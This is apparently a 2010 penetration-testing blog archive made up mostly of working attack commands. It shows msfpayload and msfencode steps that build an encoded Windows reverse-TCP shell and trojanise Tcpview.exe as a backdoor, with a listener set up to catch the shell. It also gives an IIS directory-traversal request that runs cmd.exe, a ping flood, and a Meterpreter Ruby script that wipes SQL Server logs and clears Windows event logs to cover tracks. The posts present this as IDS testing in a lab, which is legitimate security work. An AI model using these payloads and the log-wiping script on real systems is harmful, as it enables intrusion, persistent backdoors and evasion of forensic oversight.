Tuesday, May 11, 2010

My Sample Report for VA & PT

Here is my sample report which can be used for Vulnerability Analysis and Pen-Test.

Download Sample Report (VA-PT)

Monday, May 10, 2010

Download External Meterpreter Scripts and Tool

ifconfig eth1 up
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x

cd /pentest/exploits/framework3/scripts/meterpreter


wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe

Testing IDS with Encoded Payload

Step 1: On TEST-BT4, create an Encoded EXE Payload

./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe

Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2

Step 3: On TEST-BT4, launch Netcat in Listening Mode

nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole

msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)

You should see, a reverse connection from DEN-WEB2 to TEST-BT4

Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)

Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe

./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe

Testing IDS with Sample Attacks

Port Scanning

Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254

Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak

IIS Unicode Directory Traversal Exploit Test

Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter
press Enter

Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified

Apache Directory Access Test

Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
press Enter

Snort: WEB-MISC .htaccess access
Category: attempted-recon

Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter
press Enter

Snort: WEB-MISC robots.txt access
Category: web-application-activity

Ping Flood (Simple DoS Attack)

Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)

Snort: ICMP L3retriever Ping
Category: attempted-recon

IDS Evasion Attack

Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254

Installing Nessus on BackTrack and Ubuntu Desktop

Step 1: Download from http://www.nessus.org and Install Nessus

Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory

Installing Nessus with Debian Package Manager

cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb

Step 2: Add Nessus User

cd /opt/nessus/sbin
./nessus-adduser

Step 3: Register Nessus and Download All Plugins

Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.

cd /opt/nessus/bin
./nessus-fetch --register serial_number

Example:

./nessus-fetch --register 2B92-597B-2D44-C737-2309

Step 4: Launch Nessus Server and Apply All Plugins

cd /opt/nessus/sbin
./nessus-service

or

/etc/init.d/nessusd start

Step 5: Launch Nessus Client

https://localhost:8834/

Step 6: Update Plugins

cd /opt/nessus/sbin
./nessus-update-plugins

Nessus Plugins located at: /opt/nessus/lib/nessus/plugins

Friday, April 9, 2010

SQL Log Clear

Example of an MSSQL Log Clear (mssqlclear.rb)

#MSSQL Log Clear

def list_exec(session,cmdlst)
print_status("Running Command List ...")
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status "running command #{cmd}"
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)

print_status("#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end

commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
'Net START "SQL Server (SQLEXPRESS)"']
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("Clearing the #{evl} Event Log")
log = session.sys.eventlog.open(evl)
log.clear
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")

end
end

list_exec(client,commands)
clrevtlgs(client)

Tuesday, April 6, 2010